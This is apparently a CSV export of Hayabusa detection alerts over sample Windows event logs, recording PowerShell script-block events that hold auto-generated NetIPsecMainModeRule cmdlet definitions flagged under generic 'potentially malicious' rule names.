'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] 
[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Gr",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 